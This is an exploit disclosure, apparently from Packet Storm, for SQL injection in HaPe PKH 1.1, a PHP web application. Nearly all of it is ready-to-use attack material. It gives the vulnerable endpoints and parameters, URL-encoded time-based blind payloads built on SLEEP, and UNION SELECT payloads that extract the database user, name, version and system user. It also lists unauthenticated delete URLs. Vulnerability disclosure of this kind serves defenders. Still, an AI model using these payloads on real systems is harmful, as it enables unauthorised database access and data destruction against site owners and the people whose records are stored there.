HaPe PKH 1.1 SQL Injection

🗓️ 12 Oct 2018 00:00:00Reported by Ihsan SencanType
packetstorm🔗 packetstormsecurity.com👁 24 Views
HaPe PKH 1.1 SQL Injection on localhos
`# Exploit Title: HaPe PKH 1.1 - 'id' SQL Injection  
# Dork: N/A  
# Date: 2018-10-12  
# Exploit Author: Ihsan Sencan  
# Vendor Homepage: http://www.sitejo.id  
# Software Link: https://sourceforge.net/projects/hape-pkh/files/latest/download  
# Version: 1.1  
# Category: Webapps  
# Tested on: WiN7_x64/KaLiLinuX_x64  
# CVE: N/A  
  
# POC:   
# # 1) Everyone  
# POST http://localhost/[PATH]/lap-anggota-kelompok-pdf.php HTTP/1.1  
  
nama_kelompok=%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%2a%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%28%53%4c%45%45%50%28%35%29%29%29%58%29%2d%2d%20%58  
  
# 2) Everyone  
# POST http://localhost/hape-pkh/lap-peserta-perdesa-pdf.php  
  
desa=%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%2a%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%28%53%4c%45%45%50%28%35%29%29%29%58%29%2d%2d%20%58  
  
# 3) Everyone  
# http://localhost/[PATH]/admin/media.php?module=desa&act=hapus&id=[SQL]  
  
%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%2a%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%28%53%4c%45%45%50%28%35%29%29%29%58%29%2d%2d%20%58  
  
# 4) Users  
# http://localhost/[PATH]/admin/media.php?module=pengurus&act=print&id=[SQL]  
  
%2d%77%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2d%2d%20%2d  
  
# 5) Users  
# http://localhost/[PATH]/admin/media.php?module=pengurus&act=editpengurus&id=[SQL]  
  
&id=%2d%77%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2d%2d%20%2d  
  
# 6) Users  
# http://localhost/[PATH]/admin/media.php?module=fasilitas&act=editfasilitas&id=[SQL]  
  
%2d%31%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%53%59%53%54%45%4d%5f%55%53%45%52%28%29%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d  
  
# 7) Users  
# http://localhost/[PATH]/admin/media.php?module=kelompok&act=editkelompok&id=[SQL]  
  
%2d%31%27%20%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%31%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%33%2c%34%2c%35%2d%2d%20%2d  
  
# 8) Everyone  
# Delete Item *  
  
http://localhost/[PATH]/admin/modul/mod_pengurus/aksi_pengurus.php?module=pengurus&act=hapus&id=[ID]  
http://localhost/[PATH]/admin/modul/mod_update/aksi_update.php?module=update&act=hapus&id=[ID]  
  
`
12 Oct 2018 00:00Current
0.2Low risk
Vulners AI Score0.2